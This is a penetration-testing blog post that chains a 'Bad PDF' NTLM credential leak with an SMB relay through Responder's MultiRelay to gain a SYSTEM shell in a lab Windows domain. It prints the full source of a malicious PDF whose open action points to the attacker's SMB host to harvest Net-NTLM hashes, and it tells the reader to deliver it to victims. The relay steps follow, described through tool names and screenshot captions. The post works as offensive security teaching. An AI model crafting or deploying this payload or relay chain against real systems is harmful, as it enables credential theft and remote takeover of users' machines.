/ penetration testing

Bad PDF + SMB Relay = ❤

Today we are going to chain two nice exploits: Bad PDF and SMB Relay.
We hope to gain a few shells just by tricking a user to open a PDF file, awesome isn't it?
Let's see how to make everything work!

The Setup

For this test my setup is the following:

  • Windows Server 2012 with Active Directory (172.28.128.3)
  • Windows 10 Workstation (172.28.128.4)
  • My machine, which is a simple Ubuntu (172.28.128.1)
  • Latest version of Adobe Acrobat Reader DC
  • Latest version of Responder

Bad PDF

The bad PDF is a recent attack discovered by Checkpoint Security Research Team.
This attack allows an attacker to steal Net-NTLM credentials just opening a PDF file with a vulnerable reader (virtually every PDF reader).
Basically in the PDF format there is a function /F that allows you to refer remote PDF files, if you specify via UNC convention a resource (even a non-existent) that resides on the attacker machine you send him your Net-NTLM hashes (not to be confused with NTLM hashes, stored on the machine)
You can read the full disclosure and explaination at this link: https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
There is a github repo with a PoC that generates a PDF file to demostrate this attack with a SMB server provided by Responder to log the hashes.

However, that wasn'texactly what I wanted to do.
I wanted to relay those hashes in order to obtain shells on remote systems!
I peeled off the useless part of the script and figured out that I could edit the PDF by hand.
The resulting PDF file:

%PDF-1.7
1 0 obj
<</Type/Catalog/Pages 2 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>
endobj
xref
0 4
0000000000 65535 f
0000000015 00000 n
0000000060 00000 n
0000000111 00000 n
trailer
<</Size 4/Root 1 0 R>>
startxref
190
3 0 obj
<< /Type /Page
   /Contents 4 0 R
   /AA <<
	   /O <<
	      /F (\\\\172.28.128.1\\test)
		  /D [ 0 /Fit]
		  /S /GoToE
		  >>
	   >>
	   /Parent 2 0 R
	   /Resources <<
			/Font <<
				/F1 <<
					/Type /Font
					/Subtype /Type1
					/BaseFont /Helvetica
					>>
				  >>
				>>
>>
endobj
4 0 obj<< /Length 100>>
stream
BT
/TI_0 1 Tf
14 0 0 14 10.000 753.976 Tm
0.0 0.0 0.0 rg
(PDF Document) Tj
ET
endstream
endobj
trailer
<<
	/Root 1 0 R
>>
%%EOF

Note the /F function and his arguments, I am referring to the attacker machine at 172.28.128.1.
Juste save the file with .pdf extension and deliver it!

SMB/NTLM Relay

A SMB Relay is a kind of attack where a malicious actor tricks a victim to ensablish a SMB connection with him and send him his Net-NTLM creds, the attacker can replay those credentials to another machine (if you replay the creds to the same machine tha attack is called reflective smb relay, which does not work well nowdays) in order to authenticate himself and possibly obtain a shell (if the victim user has administrative credentials that are also valid on the target machine).

Since this attack is well-known I'm not going to cover the details, please refer to this blog post for the specs: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
NOTE: The author of the blog post is the one who build crackmapexec

The tools we are going to use to relay the credentials is called MultiRelay which is part of the Responder suite.
Before moving on, make sure you have the correct version of Responder on your machine: https://github.com/lgandx/Responder
You can find the MultyRelay script in the tools directory.

We have the way to obtain Net-NTLM hashes, we also have a way to using it with profit. Can we chain both attacks to obtain cheap shells? Of course we can!

The scenario

We are in a windows network with Active Directory and we have a Domain Admin that opens a pdf file, this might be our lucky day!

NOTE: BUT WAIT in AD enviroments you use Kerberos, not NTLM!
Right, but the authentication process is downgraded to NTLM if the destination host is not part of the Domain.

We choose our target carefully, making sure that SMB Signing is disabled.
SMB Signing is a mechanism that authenticates both parts of a SMB conversation, blocking the relay attacks.
Luckly, the signing mechanism is disabled by default on workstations!

In order to check if the signing is disabled, we are going to use another script from Responder suite, called RunFinger

Schermata-del-2018-06-06-17-09-26

As we can see, the Windows Server has the SMB signing enabled, but the workstation is vulnerable! Let's proceed with the exploitation.

Chaining the exploits

The attacker (us) set up MultiRelay in order to authenticate against the vulnerable machine:

Schermata-del-2018-06-06-17-15-48

The System Administrator opens the malicious PDF:
Schermata-del-2018-06-06-16-34-30

Schermata-del-2018-06-06-16-34-18
Well, the PDF if legitimate but it has no content in it.
In a real engagement this wouldn't work well ;)
But hey, something happened in the attacker machine!

Schermata-del-2018-06-06-16-33-52
Schermata-del-2018-06-06-16-33-27

SYSTEM shell gained, nice day for us, bad day for the admin.